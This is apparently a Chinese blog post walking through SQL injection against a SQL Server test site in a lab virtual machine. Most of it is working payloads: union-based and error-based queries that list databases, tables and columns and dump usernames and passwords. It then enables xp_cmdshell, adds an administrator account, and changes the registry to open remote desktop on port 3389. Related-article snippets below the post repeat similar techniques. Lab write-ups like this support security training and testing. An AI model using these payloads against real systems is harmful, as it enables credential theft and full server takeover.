SQL server 中的SQL 注入

最新推荐文章于 2024-07-23 22:14:51 发布
最新推荐文章于 2024-07-23 22:14:51 发布
阅读量405 收藏 2
点赞数
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/d1996a/article/details/108838204
版权

SQL server 中的sql注入

实验环境:
在windows server 2008虚拟机中安装SQL server 数据库。安装phpstudy ,通过一台Windows7 访问连接windows server 2008.

SQL server 联合注入

首先判断注入点,输入id=1,页面正常回显。
在这里插入图片描述

首先判断是否是数值型: id=1 and 1=1,页面正常回显
在这里插入图片描述

id=1 and 1=2,页面空显示,可以判断是数值型。
在这里插入图片描述

因为有显示位,可以用联合注入进行注入。
首先判断显示位,由此可以看出显示位为3
在这里插入图片描述
在这里插入图片描述

查询到当前使用的数据库为test:?id=-1 union select null,null,db_name()
在这里插入图片描述

查询出第一个数据库名称:
?id=-1 union select null,null,(select top 1 name from sys.sysdatabases)
在这里插入图片描述

显示第二个数据库名称:
?id=-1 union select null,null,(select top 1 name from sys.sysdatabases where name != ‘master’)
在这里插入图片描述

查询到第五个数据库为test,当前使用的数据库
?id=-1 union select null,null,(select top 1 name from sys.sysdatabases where name != ‘master’ and name != ‘model’ and name != ‘msdb’ and name != ‘tempdb’)
在这里插入图片描述

查询出test数据库下的表:
?id=-1 union select null,null,(select top 1 name from sys.sysobjects where xtype=‘u’)
在这里插入图片描述

查询出表中字段:
?id=-1 union select null,null,(select top 1 name from sys.syscolumns where id=OBJECT_ID(‘users’))
在这里插入图片描述

第二个字段名:
?id=-1 union select null,null,(select top 1 name from sys.syscolumns where id=OBJECT_ID(‘users’) and name !=‘id’)
在这里插入图片描述

第三个字段名:
?id=-1 union select null,null,(select top 1 name from sys.syscolumns where id=OBJECT_ID(‘users’) and name !=‘id’ and name != ‘username’)
在这里插入图片描述

查询出表中数据:
?id=-1 union select null,null,(select top 1 username+’~’+password from test.dbo.users)

在这里插入图片描述

SQL server 报错注入

输入id=1’ 出现报错信息
在这里插入图片描述

查询出当前使用的数据库:?id=1 and convert(int,db_name())=1
在这里插入图片描述

查询出数据库名称:?id=1 and convert(int,(select top 1 name from sys.sysdatabases where name !=‘master’ and name != ‘model’ and name != ‘msdb’ and name != ‘tempdb’))=1
在这里插入图片描述

查询出test数据库下的users表:?id=1 and convert(int,(select top 1 name from sys.sysobjects where xtype=‘u’))=1
在这里插入图片描述

查询出当前数据表中字段名:
?id=1 and convert(int,(select top 1 name from sys.syscolumns where id=OBJECT_ID(‘users’)and name != ‘id’))=1
在这里插入图片描述

查询出表中数据:
?id=1 and convert(int,(select top 1 username+’~’+password from test.dbo.users))=1
在这里插入图片描述

SQL-Server的扩展存储过程getshell

将SQL server 的内置账户改成local system
在这里插入图片描述

首先进入到master库中,没有报错说明已经进入到master库中
在这里插入图片描述

开启高级功能:?id=1 exec sp_configure ‘show advanced options’,1;reconfigure
在这里插入图片描述

开启xp_cmdshell:?id=1 exec sp_configure ‘xp_cmdshell’,1;reconfigure
在这里插入图片描述

添加一个张三用户。再到服务器上查看,可以看到zhangsan用户已经添加了
在这里插入图片描述
在这里插入图片描述

把zhangsan添加到管理员组。再去服务器上看一下,可以看到zhangsan已经是属于管理员组了

在这里插入图片描述

在这里插入图片描述

开启3389端口:?id=1 exec master…xp_cmdshell ‘REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f’
在这里插入图片描述

服务器上查看,3389端口已打开
在这里插入图片描述

使用远程桌面连接服务器
登录用户名为zhangsan,密码为123.com,登录成功
在这里插入图片描述

杜云瀑
关注
专栏目录
SQL server注入
weixin_45958861的博客
09-20 1591
较为复杂 一般不用手工 用工具 1.注入语句 ①*判断数据库类型 and exists (select * from sysobjects)–返回正常为mssql(也名sql server) and exists (select count() from sysobjects)–有时上面那个语句不行就试试这个哈 ②判断数据库版本 and 1=@@version–这个语句要在有回显的模式下才可以哦 and substring((select @@version),22,4)=‘2008’–适用
sqlserver驱动jar
11-23
例如,你可以使用`PreparedStatement`对象来执行参数化的SQL语句,提高性能并防止SQL注入攻击。 总的来说,SQL Server驱动jar是Java应用程序与SQL Server数据库通信的桥梁。理解其工作原理和使用方法对于进行Java...
SQL Server 注入
mingyqf的博客
03-22 2453
SQL Server 注入 (转至:https://www.1024sou.com/article/798425.html) 侵删 一、简介 SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 – sa权限:数据库操作,文件管理,命令执行,注册表读取等 (数据库最高权限system) db权限:文件管理,数据库操作等权限 users-administrators **public权限:**数
SQL注入SQL注入漏洞的检测及防御,零基础入门到精通
最新发布
baimao__Ch的博客
07-23 1153
SQL注入SQL Injection)是一种广泛存在于Web应用程序的严重安全漏洞,它允许攻击者在不得到授权的情况下访问、修改或删除数据库的数据。这是一种常见的攻击方式,因此数据库开发者、Web开发者和安全专业人员需要了解它,以采取措施来预防和检测SQL注入漏洞。01什么是SQL注入SQL注入是一种攻击技术,攻击者通过在输入字段插入恶意SQL代码,试图欺骗应用程序以执行不安全的数据库操作。这些恶意SQL代码将与应用程序的数据库进行交互,允许攻击者执行未授权的操作。
SQL Server注入大全及防御
网络 人生 学习 进步
09-17 1437
  SQL Server小型网站广泛使用的数据库,由于功能强大也滋生了很多安全问题,国内又因为SQL注入攻击的很长一段时间流行,导致对SQL Server的入侵技巧也层出不穷,由于SQL Server支持多语句,相信很多小黑在对SQL Server进去SQL注入的时候很少使用猜解表名之类的方法,而直接转向使用SQL Server的存储过程和函数快速的拿权限,下面我就围绕SQL Server的系
SQL-Server注入
qq_41781465的博客
08-17 146
col_name():可以根据id值得到对像的名称,而且可以返回指定下标的结果 ————————————————————object_id()只能返回用户创建的对像的ID,像以sys开头的表都是系统表所以返回不了的。特性:union all select 联合查询要加all。记录了数据库所有表的字段,常⽤字段为id、name和xtype。object_id(name)可以根据表对象名称得到表对象的ID,:记录了数据库所有表,常⽤字段为id、name和xtype。@@version 版本。
【网络安全-SQL注入(4)】一篇文章带你了解sql server数据库三大权限,以及三大权限的SQL注入SQL注入点利用以及getshell
m0_67844671的博客
10-02 2415
【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】-CSDN博客本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
在IIS SQL Server利用ISAPI ReWrite防SQL注入攻击.pdf
09-19
吴长虹在其论文《在IIS+SQL Server利用ISAPI Rewrite防SQL注入攻击》,提出了一种有效的方法来应对这一挑战。这种方法主要是利用IIS的ISAPI(Internet Server Application Programming Interface)过滤器进行...
SQL Server视图,存储过程,注入
12-14
SQL Server,视图、存储过程和SQL注入是数据库管理的重要概念,它们各自扮演着不同的角色,有助于提升数据库的安全性和效率。 一、视图 1. 视图的概念: 视图是从一个或多个表导出的虚拟表,它不存储实际...
SQLserver 2005 SP3-64位及32位补丁
03-16
2. 安全性增强:SQL Server 2005 SP3引入了更严格的默认安全设置,如强化了对SQL注入攻击的防护。此外,它还提供了一套完整的安全更新,修补了自SP2以来发现的安全漏洞,以保护数据库免受恶意攻击。 3. 数据库引擎...
SQLSERVER日志分析工具
01-05
分析工具可以帮助检测异常登录行为、未经授权的数据访问或潜在的SQL注入攻击。 4. **合规性审计**:在某些行业,法规要求保留并审计数据库活动记录。日志分析工具可以提供报告,证明数据库操作符合法规要求,以满足...
sql server 2008 mysql 手工注入
03-25
本人原创 sql server 2008 mysql 手工注入 里面有源码和数据库文件 还有用于测试的项目
c# sqlserver2008 简单的SQL注入演示
07-31
简单的程序,提供对sql注入的基本演示。
2004-8-5+ 给mssql添加用户
weixin_34113237的博客
06-29 98
打开管理器,找到需要添加用户的数据库,点开,右键单击用户,选择“新建数据库用户”,弹出“数据库用户属性-新建用户”,填好登陆名和用户名,分配好角色,然后就可以啦。先看登陆名。一般从下拉列表里选“新建”,跳出“sql server登录属性-新建登录”,然后在这里填名称,设定sel servr身份验证的密码,然后从下拉列表里选一个数据库,就是你要添加用户的那个,完事后确定。这样在登陆名下拉列表就会多出...
SQL注入-基于MSsql(sql server)的注入
LJH1999ZN的博客
02-13 5794
目录 一、如何判断该网站使用的是sql server 数据库 二、sql server 数据库包含三张主要系统表 三、sql server 主要函数 四、数据库的注入流程 五、sql server 的联合查询 六、sql server 的报错注入 七、sql server 的布尔型盲注。 一、如何判断该网站使用的是sql server 数据库 根据后缀判断:如果后缀为aspx,数据库大概是sql server 根据报错信息判断,报错信息有Microsoft 字样。 根据系统表判断,a
1、sql server数据库进行sql注入
weixin_51520483的博客
05-15 971
1、判断数据类型是很重要的一点,影响后面的注入语句2、确定列数时,要多测几组数据,从而分析判断列数,并不是遇到第一个报错就停止测试3、正常网页(例如id=1,参数正确)没有注入回显时,试试报错情况(id=-1),注入回显有可能被正常返回数据覆盖4、注入回显的字段有可能整形、字符、小数等,注意是否需要单引号5、最好先全部统一会先字段类型,比如全部整形,挨个轮流改变为字符形。
SQL Server注入
weixin_34129145的博客
11-05 83
1.利用错误消息提取信息 1.1 枚举当前表与列 select * from users where username='root' and password='root' having 1=1--' 抛出错误:选择列表的列 'users.id' 无效,因为该列没有包含在聚合函数或 GROUP BY 子句。   发现表名为 'users',存在列名为 'id' sele...
微软SQL Server 注入攻击技术详解
SQL Server 注入攻击是一种常见的 Web 应用安全漏洞,攻击者可以通过在 Web 应用程序的输入参数注入恶意 SQL 语句,以达到非法访问或控制数据库的目的。 **什么是 SQL Server 注入攻击?** SQL Server 注入攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值